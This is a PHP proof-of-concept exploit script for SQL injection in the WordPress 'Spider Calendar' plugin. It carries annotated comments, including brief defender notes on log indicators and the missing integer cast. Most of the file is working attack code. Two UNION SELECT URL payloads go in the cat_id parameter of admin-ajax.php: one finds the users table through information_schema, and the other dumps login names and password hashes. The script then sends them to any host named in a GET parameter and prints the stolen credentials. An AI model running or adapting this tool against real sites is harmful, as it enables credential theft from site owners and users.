WordPress Spider Calendar Exploit

<?php

/*
 This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

    Author: Mateusz Sławomir Lach
 */

// Proof of concept for a SQL injection in the WordPress "Spider Calendar" plugin.
//
// Both URL templates below hit /wp-admin/admin-ajax.php?action=spiderbigcalendar_month
// and use the cat_id parameter to close the plugin's own query with ")" and append a
// UNION SELECT. The "%%20" sequences are sprintf-escaped "%20" (URL-encoded spaces);
// the CHAR(...) calls spell out marker strings that the script later looks for in the
// HTML response (CHAR(35,35,35,35) = "####", CHAR(35,33,35,33,35,33,35) = "#!#!#!#",
// CHAR(35,35) = "##", CHAR(37,117,115,101,114,115) = "%users").
//
// Defender notes: the observable indicator in web-server / WAF logs is a request to
// this admin-ajax action whose cat_id value contains "UNION SELECT" or
// "information_schema". The root cause is the plugin interpolating cat_id into SQL
// without casting it to an integer or using a prepared statement; that is where the
// fix belongs.

// Step 1: read the name of the users table (table_name LIKE '%users') from
// information_schema.tables, wrapped in "####" markers.
// Placeholders: %s host, %s cur_page_url host, %s fake id used as the first UNION column.
define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');

// Step 2: GROUP_CONCAT user_login "##" user_pass rows from the table found in step 1,
// wrapped in "#!#!#!#" markers. GROUP_CONCAT's default "," separator is ROW_SEPARATOR.
// Placeholders: %s host, %s cur_page_url host, %s fake id, %s table name.
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');

// Sentinel value placed in the first UNION column; presumably the plugin renders it
// into an "ev_ids=" link, which is how success is detected below (PATTERN_TO_SEARCH).
define('FAKE_ID_TO_SEARCH', 12345677654321);
define('PATTERN_TO_SEARCH', 'ev_ids='.FAKE_ID_TO_SEARCH);
// Marker around the user rows (matches CHAR(35,33,35,33,35,33,35) in FETCH_USERS_URL).
define('PATTERN_TO_SEARCH_USERS', '#!#!#!#');
define('ROW_SEPARATOR', ',');
define('FIELD_SEPARATOR', '##');
// Target host comes straight from the query string and is interpolated into the URL
// unvalidated. Note that empty() is also true for the string "0".
$server = $_GET['SRV'];
if (empty($server))
{
    echo 'Please put server name in SRV GET variable!';
}
else
{
    // Request 1: table-name discovery. curl_exec() returns false on transport failure;
    // stripos() on false is simply treated as "not vulnerable" below.
    $fullURL = sprintf(FETCH_PREFIX_URL, $server, $server, FAKE_ID_TO_SEARCH);
    $prefixCurl = curl_init($fullURL);
    curl_setopt($prefixCurl, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($prefixCurl);
    if (stripos($result, PATTERN_TO_SEARCH) !== false)
    {
        // Extract the "####<name>####" marker emitted by the injected subquery.
        preg_match('/####[a-zA-Z\_0-9]*####/', $result, $tableNames);
        $tableName = str_replace('####', '', $tableNames[0]);
        // Everything echoed from here on originates in the target's response and is
        // written into this page as raw HTML without escaping.
        echo 'tableName: '.$tableName.'<BR/>';
        // Request 2: dump login/hash pairs from the discovered table.
        $fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
        $usersCurl = curl_init($fullURL);
        curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
        $result = curl_exec($usersCurl);  
        if (stripos($result, PATTERN_TO_SEARCH) !== false)
        {
            // Cut the response down to the span between the first and second
            // "#!#!#!#" markers, then turn "," and "##" into table rows/cells.
            $from = stripos($result, PATTERN_TO_SEARCH_USERS);
            $to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
            $result = substr($result, $from, $to-$from);
            echo '<table><tr><td>'.str_replace(FIELD_SEPARATOR, '</td><td>', str_replace(ROW_SEPARATOR, '</td></tr><tr><td>', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))).'</td></tr></table>';
        }
        else
        {
            echo 'Table name fetched, but not users - try to rewrite exploit :-(';
        }
    }
    else
    {
        echo 'NOT vulnerable :-(';
    }
}